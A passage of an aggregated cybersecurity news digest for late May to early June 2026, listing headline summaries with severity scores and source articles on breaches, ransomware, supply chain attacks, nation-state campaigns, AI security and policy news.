  • ShinyHunters Leaks Charter Communications Data Affecting Millions of Users (2026-05-30, 1 outlet, severity 4/5)
    • Charter Communications Data Breach Could Impact Nearly 5 Million - SecurityWeek
  • 7-Eleven, GitHub, and Grafana Labs Face Recent Cyber Breaches (2026-05-26, 1 outlet, severity 4/5)
    • 25th May – Threat Intelligence Report - Check Point Research
  • Lithuania Investigates Massive Data Leak From National Register Databases (2026-05-26, 1 outlet, severity 4/5)
    • Lithuania Suspects Foreign Involvement in Data Leak of Over 600,000 National Register Entries - SecurityWeek
  • ShinyHunters breached 7-Eleven Salesforce environment to leak personal information (2026-05-26, 2 outlets, severity 3/5)
    • 7-Eleven data breach exposes personal information of 185,000 people - BleepingComputer
    • 185,000 Likely Impacted by 7-Eleven Data Breach - SecurityWeek
  • Lithuania’s Centre of Registers Investigated After 600,000 Records Stolen (2026-05-27, 1 outlet, severity 3/5)
    • Lithuania investigates theft of 600,000 state registry records by foreign actor - The Record from Recorded Future News
  • ShinyHunters Breaches Drive Growing Delays in Corporate Data Disclosures (2026-06-01, 1 outlet, severity 3/5)
    • 1,000 Data Breaches Later, the Disclosure Lag is Worse Than Ever - Troy Hunt
  • Uruguayan Citizen Data Leaked in Massive 5.8 Million Record Breach (2026-05-28, 1 outlet, severity 3/5)
    • Latin American Cybercriminals Hoover Up Government Data - darkreading
  • ShinyHunters Leaks DentaQuest Data and Targets BCD Travel (2026-06-01, 1 outlet, severity 3/5)
    • Weekly Update 506 - Troy Hunt
  • BtCIRT Joins Have I Been Pwned to Monitor Government Domains (2026-05-26, 1 outlet, severity 2/5)
    • Welcoming the Bhutanese Government to Have I Been Pwned - Troy Hunt

Ransomware

  • Akira Ransomware Attack Traced Through Correlated VPN and Endpoint Logs (2026-05-28, 1 outlet, severity 3/5)
    • Reconstructing an Akira Ransomware Kill Chain from Perimeter and Endpoint Logs, (Wed, May 27th) - SANS Internet Storm Center, InfoCON: green
  • Storm-2697’s The Gentlemen Ransomware Uses Go-Based Self-Propagation Tactics (2026-05-29, 1 outlet, severity 3/5)
    • The Gentlemen ransomware: Dissecting a self-propagating Go encryptor - Threat intelligence | Microsoft Security Blog
  • Play Ransomware Gang Claims Breach of MyPillow, Company Denies (2026-05-29, 1 outlet, severity 2/5)
    • MyPillow listed on ransomware gang’s leak site, but denies it has been breached - GRAHAM CLULEY

Supply Chain Attacks

  • SymJack Attack Exploits AI Coding Agents for Supply Chain Attacks (2026-05-27, 1 outlet, severity 4/5)
    • ‘SymJack’ Attack Turns AI Coding Agents Into Supply Chain Attack Delivery Systems - SecurityWeek
  • codexui-android npm package steals OpenAI Codex authentication tokens (2026-06-01, 1 outlet, severity 3/5)
    • OpenAI Codex Authentication Tokens Stolen in codexui-android npm Supply Chain Attack - The Hacker News
  • Malicious Sicoob.Sdk NuGet Package Steals Banking Credentials and Certificates (2026-05-29, 1 outlet, severity 3/5)
    • Malicious Sicoob NuGet Steals Banking Credentials as npm Packages Target Cloud Secrets - The Hacker News
  • Malware-Slop npm package steals Claude AI user files via GitHub (2026-05-28, 1 outlet, severity 3/5)
    • Malicious npm Package Stole Files From Claude AI User Directory via GitHub - The Hacker News

Nation-State / APT

  • Catalin Dragomir Hacked Oregon Department of Emergency Management and American Companies (2026-05-27 to 2026-05-29, 3 outlets, severity 3/5)
    • Romanian Hacker Sentenced to Prison in US for Selling Access to State Network - SecurityWeek
    • Romanian national sentenced to more than 4 years for hacking Oregon government systems - The Record from Recorded Future News
    • Romanian gets 5 years in prison for hacking Oregon govt network - BleepingComputer
  • GreyVibe uses AI tools for cyberespionage attacks against Ukrainian organizations (2026-05-29, 3 outlets, severity 3/5)
    • GreyVibe hackers use ChatGPT, Gemini to power cyberattacks - BleepingComputer
    • Russia-Linked ‘GreyVibe’ Attackers Use AI to Supercharge Cyberattacks - SecurityWeek
    • New Russian-Linked GREYVIBE Targets Ukraine with AI-Powered Cyberattacks - The Hacker News
  • MuddyWater Uses DLL Side-Loading for Global Espionage Campaign (2026-05-27, 1 outlet, severity 4/5)
    • MuddyWater Uses DLL Side-Loading in Espionage Campaign Targeting 9 Countries - The Hacker News
  • Russia uses hybrid warfare and AI to target UK critical infrastructure (2026-05-28, 2 outlets, severity 3/5)
    • UK spy chief labels AI ‘unstoppable force’ with offensive, defensive ramifications for cyberspace - CyberScoop
    • UK Cyberspying Chief Calls AI ‘an Unstoppable Force’ and Warns About Russia - SecurityWeek
  • Check Point Report: Election Threats Target Campaigns, Not Voting Machines (2026-06-01, 1 outlet, severity 3/5)
    • Election threats are focused on campaign systems, not voting machines - CyberScoop
  • GCHQ Chief Warns Russia Launches Daily Hybrid Attacks on UK (2026-05-29, 1 outlet, severity 3/5)
    • Russia conducting daily attacks on UK 'from seabed to cyberspace,' spy chief warns - The Record from Recorded Future News
  • Unknown hackers used Ravage framework to target Russian maritime institutions (2026-06-01, 1 outlet, severity 3/5)
    • Unknown hacker group targeted Russian maritime universities, diplomats for nearly two years - The Record from Recorded Future News
  • Andrei Kozlov, linked to Fancy Bear, joins Russia's Security Council (2026-05-26, 1 outlet, severity 3/5)
    • Kremlin appoints cyber executive with alleged GRU ties to Security Council role - The Record from Recorded Future News
  • Kimsuky Uses HTTPSpy and VS Code Tunnels to Target South Korea (2026-05-29, 1 outlet, severity 3/5)
    • Kimsuky Deploys HTTPSpy, Expands Arsenal with HelloDoor and VS Code Tunnels - The Hacker News

Malware & Botnets

  • RondoDox Botnet Targets ASUS Routers Amid Rising Linux Vulnerabilities (2026-05-26, 1 outlet, severity 4/5)
    • ⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos - The Hacker News
  • Threat actors use ChatGPT features to distribute malware targeting Windows and macOS users (2026-05-28 to 2026-05-30, 2 outlets, severity 3/5)
    • Fake ChatGPT download site infects Windows and Mac users with malware - Malwarebytes
    • ChatGPT share links abused to host fake outage pages to deliver malware - BleepingComputer
  • Grandoreiro and BTMOB Malware Target Windows and Android Users (2026-05-28, 1 outlet, severity 3/5)
    • Grandoreiro Malware and BTMOB RAT Campaigns Target Windows and Android Users - The Hacker News
  • DinDoor RAT distributed via fake software on GitHub and SourceForge (2026-05-27, 1 outlet, severity 3/5)
    • Fake software on GitHub and SourceForge distribute Deno RAT - Malwarebytes
  • Flare Research Reveals Evolution of DDoS-as-a-Service Market Trends (2026-05-30, 1 outlet, severity 3/5)
    • From $5 Attacks to Botnet-Powered Platforms: Inside the DDoS-as-a-Service Market - BleepingComputer
  • Unit 42 Report: Shai-Hulud Malware and Evolving Cyber Extortion Tactics (2026-05-28, 1 outlet, severity 3/5)
    • Out of the Crypt: The Evolving Cyber Extortion Economy - Unit 42
  • SmartApeSG ClickFix Campaign Deploys NetSupport RAT via Malicious Scripts (2026-06-01, 1 outlet, severity 3/5)
    • Unidentified RAT pushes NetSupport RAT, (Mon, Jun 1st) - SANS Internet Storm Center, InfoCON: green
  • ClickFix Malware and Carnival Data Breach Highlight Weekly Security Threats (2026-06-01, 1 outlet, severity 3/5)
    • A week in security (May 25 – May 31) - Malwarebytes
  • DShield Sensor Analysis Reveals Yearly Trends in Malicious File Uploads (2026-05-29, 1 outlet, severity 2/5)
    • Analysis of a Year of Files Uploaded to DShield Sensors, (Wed, May 27th) - SANS Internet Storm Center, InfoCON: green
  • Microsoft Defender for Endpoint Now Automatically Isolates Compromised Devices (2026-05-26, 1 outlet, severity 1/5)
    • Microsoft Defender can now automatically isolate hacked endpoints - BleepingComputer
  • Proofpoint Launches Active Exploits Protection to Combat Real-World Attacks (2026-05-27, 1 outlet, severity 1/5)
    • Proofpoint Introduces Active Exploits Protection to Help Organizations Prioritize Vulnerability Patching for Real-World Attacks in the AI Era - Proofpoint News Feed
  • YARA-X 1.17.0 Release Features Performance Enhancements and Bugfix (2026-06-01, 1 outlet, severity 1/5)
    • YARA-X 1.17.0 Release, (Sun, May 31st) - SANS Internet Storm Center, InfoCON: green

Phishing & Social Engineering

  • GHOST STADIUM campaign uses phishing domains to target FIFA for fraud (2026-05-29, 2 outlets, severity 3/5)
    • FBI warns of fake FIFA websites running World Cup fraud schemes - BleepingComputer
    • Chinese-speaking fraud gang could be stealing millions from 2026 World Cup fans - The Record from Recorded Future News
  • Threat actors use BTMOB Android malware to target users via phishing (2026-05-29, 2 outlets, severity 3/5)
    • BTMOB Android malware service generates custom phishing payloads - BleepingComputer
    • New BTMOB Android Malware Enables Full Device Takeover - SecurityWeek
  • ACR Stealer distributed via fake Claude impersonation websites (2026-05-26, 1 outlet, severity 3/5)
    • Possible ACR Stealer From Page Impersonating Claude, (Tue, May 26th) - SANS Internet Storm Center, InfoCON: green
  • Adobe Target infrastructure used in LinkedIn phishing tracking campaign (2026-05-27, 1 outlet, severity 3/5)
    • Fake LinkedIn emails abuse Adobe to track victims - Malwarebytes
  • Signal users targeted by phishing attacks stealing backup recovery keys (2026-05-29, 1 outlet, severity 3/5)
    • Signal users targeted in backup-stealing phishing attacks - Malwarebytes
  • Trump Mobile Data Breach and FIFA World Cup Phishing Alerts (2026-05-30, 1 outlet, severity 3/5)
    • In Other News: Trump Mobile Data Breach, FIFA World Cup Phishing, CISA Responds to Supply Chain Attacks - SecurityWeek
  • MokN Secures $15 Million to Expand Phish-Back Platform Globally (2026-05-30, 1 outlet, severity 1/5)
    • MokN Raises $15 Million for Phish-Back Platform - SecurityWeek

Cloud & Infrastructure Security

  • Token Security Discovers Exploit Chain Threatening Zapier Platform Takeover (2026-05-30, 1 outlet, severity 3/5)
    • With Complex Cloud Integrations, Small Errors Lead to Major Compromises - darkreading
  • Red Access Report: 2,000 Vibe-Coded Apps Expose Sensitive Data (2026-05-29, 1 outlet, severity 3/5)
    • What 2,000 Exposed Vibe-Coded Apps Reveal About the Limits of Most Security Stacks - The Hacker News
  • Microsoft MFA and My Sign-Ins Platform Face Service Outage (2026-06-01, 1 outlet, severity 2/5)
    • Microsoft confirms outage affecting MFA, My Sign-Ins platform - BleepingComputer
  • CISOs Must Assess Security Risks in Sovereign-Cloud Adoption (2026-05-29, 1 outlet, severity 2/5)
    • How CISOs can manage sovereign-cloud security risks - Cybersecurity Dive - Latest News
  • Google Cloud Launches AI Threat Defense to Combat Cyberattacks (2026-05-28, 1 outlet, severity 1/5)
    • Google Unveils AI Threat Defense Platform to Fight AI-Powered Cyberattacks - SecurityWeek
  • Kaseya SIEM helps MSPs unify data and reduce alert fatigue (2026-05-29, 1 outlet, severity 1/5)
    • How SIEM helps MSPs reduce noise and stop threats faster - BleepingComputer

Identity & Access Management

  • Yanluowang Used MFA Prompt Bombing to Breach Cisco VPN (2026-05-26, 1 outlet, severity 4/5)
    • MFA Prompt Bombing: Why Your Second Factor Isn't Saving You - The Hacker News
  • Scattered Spider Uses Stolen Credentials to Bypass Modern Security (2026-05-27, 1 outlet, severity 3/5)
    • The Credential Crisis: How Stolen Credentials Defeat Modern Security - SecurityWeek
  • CISA contractor leaks credentials on GitHub and Oura ring privacy risks (2026-05-28, 1 outlet, severity 3/5)
    • Smashing Security podcast #469: What your Oura ring won’t tell you - GRAHAM CLULEY
  • Active Directory: Use Passphrases and Self-Service to Simplify Security (2026-05-28, 1 outlet, severity 1/5)
    • Can you enforce strong Active Directory password rules without frustrating users? - BleepingComputer

AI & Machine Learning Security

  • Bissa Scanner and Agentic Config Files Drive AI Cyberattacks (2026-05-26, 1 outlet, severity 4/5)
    • AI Threat Landscape Digest March-April 2026 - Check Point Research
  • ChatGPhish Vulnerability Exploits ChatGPT Summaries for Phishing Attacks (2026-05-30, 1 outlet, severity 3/5)
    • ChatGPhish Vulnerability Turns ChatGPT Web Summaries Into a Phishing Surface - The Hacker News
  • Pentagon AI Push Faces Pushback From Military Leaders Over Oversight (2026-06-01, 1 outlet, severity 3/5)
    • As the Pentagon Pushes for Battlefield AI, Some Military Leaders Urge Caution - SecurityWeek
  • LayerX Security Report: Top 5% of Users Drive AI Risk (2026-05-28, 1 outlet, severity 3/5)
    • New AI Usage Report: Enterprise AI Risk Is Heavily Concentrated Among a Small Group of AI "Power users" - The Hacker News
  • AI-Assisted Exploit Development Outpaces Security Scanner Detection Capabilities (2026-05-28, 1 outlet, severity 3/5)
    • AI-Assisted Exploit Development Outpaces Scanner Detection - darkreading
  • Cisco Report: Multi-turn Prompts Increase Vulnerability in Leading AI Models (2026-05-28, 1 outlet, severity 2/5)
    • Leading AI models are more vulnerable to malicious prompts than vendors claim - Cybersecurity Dive - Latest News
  • House Subcommittee to Hold Hearing on AI’s Cybersecurity Impact (2026-05-29, 1 outlet, severity 2/5)
    • House panel poised to hold hearing centered on AI impact on cyber - CyberScoop
  • DockSec uses AI to automate Docker image vulnerability fixes (2026-05-26, 1 outlet, severity 2/5)
    • Open Source DockSec Uses AI to Cut Through Vulnerability Noise in Docker Images - SecurityWeek
  • Securing Generative AI: Four Essential Data Protection Best Practices (2026-06-01, 1 outlet, severity 2/5)
    • Top 4 data security best practices for the AI-enabled enterprise - Cybersecurity Dive - Latest News
  • Enterprise Data Risks Rise as Shadow AI Tools Expand (2026-05-29, 1 outlet, severity 2/5)
    • Enterprise data is creeping its way into shadow AI tools - Cybersecurity Dive - Latest News
  • Agentic AI Risks Stem From Flawed Organizational Deployment Strategies (2026-05-29, 1 outlet, severity 2/5)
    • Agentic AI Isn't Risky; the Way Orgs Deploy It Is - darkreading
  • Managing Shadow AI: Five Steps to Secure Corporate Data (2026-05-28, 1 outlet, severity 2/5)
    • 5 Steps to Managing Shadow AI Tools Without Slowing Down Employees - The Hacker News
  • Anthropic rolls out Claude Mythos model with new security platform integrations (2026-05-26, 2 outlets, severity 1/5)
    • Anthropic’s restricted Claude Mythos model may be coming to Claude Code - BleepingComputer
    • Anthropic Expands Claude’s Enterprise Security Governance With 28 New Integrations - SecurityWeek
  • Edamame Technologies Launches Security Platform to Monitor AI Coding Agents (2026-05-28, 1 outlet, severity 1/5)
    • New Edamame Platform Aims to Catch AI Coding Agents Going Off the Rails - SecurityWeek
  • AI Agents Drive New Era of Machine-Speed Cyber Attacks (2026-05-28, 1 outlet, severity 1/5)
    • Raising the Cybersecurity Stakes: Ante up for the Agentic Era - SecurityWeek
  • Anthropic Launches Claude Sandbox and New Security Guidance Plugin (2026-05-27, 1 outlet, severity 1/5)
    • Anthropic Releases New Claude Sandbox, Security Guidance Plugin - SecurityWeek
  • SecurityWeek AI Risk Summit Coming to Half Moon Bay (2026-05-28, 1 outlet, severity 1/5)
    • SecurityWeek to Host AI Risk Summit August 11-12 at the Ritz-Carlton, Half Moon Bay - SecurityWeek
  • Geordie Secures $30 Million to Advance AI Agent Security Platform (2026-05-29, 1 outlet, severity 1/5)
    • Geordie Raises $30 Million for AI Security and Governance Platform - SecurityWeek

Legal & Law Enforcement

  • Dutch Police Seize 800 Servers and Arrest Two Cybercrime Suspects (2026-05-26, 1 outlet, severity 4/5)
    • Netherlands Seizes 800 Servers, Arrests 2 for Aiding Cyberattacks - Krebs on Security
  • Dutch Authorities Disrupt 17 Million Device Botnet and Asocks Infrastructure (2026-05-30, 1 outlet, severity 4/5)
    • Dutch govt disrupts malware botnet with 17 million infected devices - BleepingComputer
  • Man Arrested After Exploiting AFC Ajax App and API Vulnerabilities (2026-05-27 to 2026-05-29, 3 outlets, severity 3/5)
    • Dutch police arrests suspect linked to Ajax football club hack - BleepingComputer
    • Dutch police arrest man over cyber breach at Ajax football club - The Record from Recorded Future News
    • Police arrest man following hack of Ajax football club - GRAHAM CLULEY
  • Michele Spagnuolo charged for using Google data to trade on Polymarket (2026-05-29, 2 outlets, severity 3/5)
    • Google security engineer accused of turning confidential search trends into $1.2M win on Polymarket - CyberScoop
    • US charges Google security engineer with Polymarket insider trading - BleepingComputer
  • THE.Hosting activity persists despite Dutch raid and server seizures (2026-05-29, 1 outlet, severity 3/5)
    • Dutch Raid Fails to Dent Russian Bulletproof Host - darkreading
  • Ramanan Pathmanathan Gets 33 Years for Targeting 145 Children (2026-05-28, 1 outlet, severity 3/5)
    • Sextortionist sentenced to 33 years for targeting 145 children - BleepingComputer
  • C.A. Cloud Attribution Executives Plead Guilty to Aiding Microsoft Scams (2026-05-26, 1 outlet, severity 3/5)
    • Scammers pretending to be Microsoft had help from US executives - Malwarebytes
  • Zachary Sweeney Pleads Not Guilty to 764 Exploitation Charges (2026-05-30, 1 outlet, severity 2/5)
    • Tennessee man linked to 764 accused of series of crimes against children dating back to 2022 - CyberScoop
  • Microsoft to forgo legal action against security researchers over vulnerabilities (2026-06-01, 1 outlet, severity 2/5)
    • Microsoft says it will not pursue security researchers after zero-day backlash - The Record from Recorded Future News
  • FBI 2025 Internet Crime Report Reveals Latest Cybercrime Statistics (2026-05-28, 1 outlet, severity 1/5)
    • FBI’s 2025 Internet Crime Report - Schneier on Security

Policy & Regulation

  • NIST National Vulnerability Database Audit Reveals Mismanagement and Backlogs (2026-05-30, 1 outlet, severity 3/5)
    • Federal audit reveals NIST’s NVD is plagued by poor planning and duplication - CyberScoop
  • CERT-In Mandates 12-Hour Patching Window to Combat AI-Driven Attacks (2026-05-26, 1 outlet, severity 3/5)
    • CERT-In Mandates 12-Hour Patching for Internet-Facing Flaws Amid AI-Assisted Attacks - The Hacker News
  • Gen. Joshua Rudd Orders Cyber Command Modernization and Acquisition Reviews (2026-05-28, 1 outlet, severity 2/5)
    • Rudd orders Cyber Command reviews as Pentagon presses reform agenda - The Record from Recorded Future News
  • White House Memo M-26-14 Mandates Risk-Based Cybersecurity Logging for Agencies (2026-05-27, 1 outlet, severity 2/5)
    • White House charts new course for federal agencies and cybersecurity logging - CyberScoop
  • Truesec Report: Nordic CISOs Successfully Contain Rising Cyber Threats (2026-05-28, 1 outlet, severity 2/5)
    • Nordic CISOs Handle Rising Cyber Threats Remarkably Well - darkreading
  • TN, FL, and NY Cyber Leaders Seek Increased Federal Funding (2026-05-27, 1 outlet, severity 2/5)
    • State Cyber Leaders Beg Congress for More Funding, Support - darkreading
  • HR Acuity Warns Compliance Dashboards Miss Critical Employee Relations Risks (2026-05-28, 1 outlet, severity 2/5)
    • Your Compliance Dashboard Can’t Tell You Everything About Employee Relations - Corporate Compliance Insights
  • Trump Executive Order Links College Athletics Compliance to Federal Funding (2026-05-29, 1 outlet, severity 1/5)
    • Executive Order Targets College Athletics Compliance & Federal Funding - Corporate Compliance Insights
  • SEC Moves to Rescind Greenhouse Gas Emissions Reporting Rule (2026-05-30, 1 outlet, severity 1/5)
    • SEC Moves to Formally Rescind Climate Reporting Rule - Corporate Compliance Insights
  • Zoë Arden: Using Storytelling to Drive Compliance and Culture (2026-06-01, 1 outlet, severity 1/5)
    • Telling the Story of Compliance - Corporate Compliance Insights
  • Gartner Analysts Urge Compliance Officers to Adopt Coaching Roles (2026-05-26, 1 outlet, severity 1/5)
    • How Compliance Officers Can Be Better Coaches - Corporate Compliance Insights
  • Smarsh, Socure, and Auditoria.AI Announce New GRC Tech Innovations (2026-05-30, 1 outlet, severity 1/5)
    • GRC News Roundup: Smarsh, Socure, CPRS & More - Corporate Compliance Insights

Other Cybersecurity

  • Cryptojacking campaign uses SEO poisoning to target high-performance computer systems (2026-05-27 to 2026-05-28, 2 outlets, severity 3/5)
    • AI Chatbot Recommendations Redirect Users to Cryptojacking Malware Sites - The Hacker News
    • GPU mining malware spreads via SEO poisoning, AI chatbots - BleepingComputer
  • Russian ShOAB-0.5 Submunitions Found After Mali Military Airstrikes (2026-05-27, 1 outlet, severity 3/5)
    • Banned Russian Submunitions Found After Mali’s Military Announces Airstrikes - bellingcat
  • The Com Ecosystem Links Cyberattacks to Violence and Exploitation (2026-05-29, 1 outlet, severity 3/5)
    • 'The Com' Cyberattacks Support Violence & Sexploitation - darkreading
  • 2026 FIFA World Cup Faces Rising Global Cyberattack Threats (2026-05-28, 1 outlet, severity 3/5)
    • 2026 World Cup: Discussing The World’s Biggest Game’s Attack Surface - Unit 42
  • Apple Open-Sources Quantum-Resistant Encryption and Verification Tools (2026-05-27, 1 outlet, severity 3/5)
    • Apple open-sources quantum-resistant encryption code - CyberScoop
  • UIB and CyberCube Report Surge in Asia-Pacific Cyber Insurance (2026-05-30, 1 outlet, severity 3/5)
    • Asia's Cyber Insurance Market Shows Signs of Life - darkreading
  • Penney and Schneier Warn Trump Administration Uses Tactics to Suppress Dissent (2026-05-29, 1 outlet, severity 2/5)
    • Chilling Effects - Schneier on Security
  • Megaproject Construction Scale Increases Legal Risks and Litigation Exposure (2026-05-29, 1 outlet, severity 2/5)
    • Stadium Booms & Megaprojects: How Construction Scale Is Driving Legal Risk - Corporate Compliance Insights
  • OpenAI Unveils Five-Part Plan to Protect 2026 Midterm Elections (2026-05-28, 1 outlet, severity 2/5)
    • OpenAI heralds cybersecurity, election interference safeguard plans for 2026 midterms - CyberScoop
  • Anthropic to Release Mythos-Class Models to the Public Soon (2026-05-29, 1 outlet, severity 2/5)
    • Anthropic confirms Claude Mythos-class models will roll out to the public - BleepingComputer
  • Rainey Reitman Warns Payment Apps Use Surveillance for Financial Censorship (2026-06-01, 1 outlet, severity 2/5)
    • Payment apps are watching what you say (Lock and Code S07E11) - Malwarebytes
  • WiFi Sensing Technology Can Identify People via Radio Signal Patterns (2026-05-27, 1 outlet, severity 2/5)
    • Identifying People Using Wi-Fi Routers - Schneier on Security
  • Satellite Imagery Reveals 115 Destroyed Villages in Myanmar’s Rakhine State (2026-05-27, 1 outlet, severity 1/5)
    • The ‘Lost’ Villages of Myanmar’s Rakhine - bellingcat
  • RevEng.AI and Lastwall Secure Series A Funding for Security Platforms (2026-05-27, 1 outlet, severity 1/5)
    • RevEng.AI Raises $15 Million to Hunt for Flaws and Backdoors in Software Binaries - SecurityWeek
  • Cynomi Leads Shift Toward Security Growth Platforms for MSPs (2026-06-01, 1 outlet, severity 1/5)
    • The Security Growth Platform: Why MSPs Are Moving Beyond vCISO Tools - The Hacker News
  • Enron, Blue Bell, and FTX: Lessons in Governance Failure (2026-05-27, 1 outlet, severity 1/5)
    • Enron, Blue Bell & FTX: Revisiting Corporate Governance Failures - Corporate Compliance Insights
  • Cisco Talos Launches EvidenceForge for High-Fidelity Synthetic Security Logs (2026-05-27, 1 outlet, severity 1/5)
    • Introducing EvidenceForge: Synthetic security logs that don’t look (as) fake - Cisco Talos Blog
  • Corlytics Appoints Lisa Miles-Heal as New Chief Executive Officer (2026-05-30, 1 outlet, severity 1/5)
    • Regtech Firm Corlytics Names New CEO - Corporate Compliance Insights
  • Patty Azzarello’s Strategies for Silencing Your Inner Critic (2026-06-01, 1 outlet, severity 1/5)
    • Outsmarting Your Inner Critic - Corporate Compliance Insights
  • Prasen Shelar Wins Dark Reading Cartoon Caption Contest With AI Entry (2026-05-30, 1 outlet, severity 1/5)
    • Name That Toon: Mark of (Cybersecurity) Progress - darkreading
  • SecurityWeek Releases On-Demand Threat Detection and Incident Response Sessions (2026-05-26, 1 outlet, severity 1/5)
    • Watch on Demand: Threat Detection & Incident Response Summit – All Sessions Available - SecurityWeek
  • ISC Stormcast Podcast Covers Daily Security News for June 1st (2026-06-01, 1 outlet, severity 1/5)
    • ISC Stormcast For Monday, June 1st, 2026 https://isc.sans.edu/podcastdetail/9952, (Mon, Jun 1st) - SANS Internet Storm Center, InfoCON: green
  • Squid’s New Post Offers Insights Into Current Security News (2026-05-30, 1 outlet, severity 1/5)
    • Friday Squid Blogging: Another Squid - Schneier on Security
  • ISC Stormcast May 28, 2026: Threat Level Remains Green (2026-05-28, 1 outlet, severity 1/5)
    • ISC Stormcast For Thursday, May 28th, 2026 https://isc.sans.edu/podcastdetail/9948, (Thu, May 28th) - SANS Internet Storm Center, InfoCON: green
  • ISC Stormcast Podcast: May 27, 2026, with Brad Duncan (2026-05-27, 1 outlet, severity 1/5)
    • ISC Stormcast For Wednesday, May 27th, 2026 https://isc.sans.edu/podcastdetail/9946, (Wed, May 27th) - SANS Internet Storm Center, InfoCON: green
  • ISC Stormcast May 26th: Daily Cybersecurity Threat Update (2026-05-26, 1 outlet, severity 1/5)
    • ISC Stormcast For Tuesday, May 26th, 2026 https://isc.sans.edu/podcastdetail/9944, (Tue, May 26th) - SANS Internet Storm Center, InfoCON: green
  • ISC Stormcast Weekly Cybersecurity Update for May 29, 2026 (2026-05-29, 1 outlet, severity 1/5)
    • ISC Stormcast For Friday, May 29th, 2026 https://isc.sans.edu/podcastdetail/9950, (Fri, May 29th) - SANS Internet Storm Center, InfoCON: green

Reported Data Breaches

Breaches reported via Have I Been Pwned this period.

  • Edmunds Data Breach Compromises Over 177,000 User Accounts (2026-06-01)
  • Atlas Menu breach exposes over 63,000 user accounts (2026-05-31)
  • ShinyHunters Uses Compromised Employee Accounts to Breach Charter and Carnival (2026-05-29)
  • ShinyHunters Uses Social Engineering to Breach Kemper Corporation and Carnival Corporation (2026-05-28)
  • Mytheresa Data Breach Compromises Over 84,000 User Accounts (2026-05-27)
  • ShinyHunters Conducts Salesforce Extortion Campaigns Against Ameriprise Financial and Charter Communications (2026-05-27)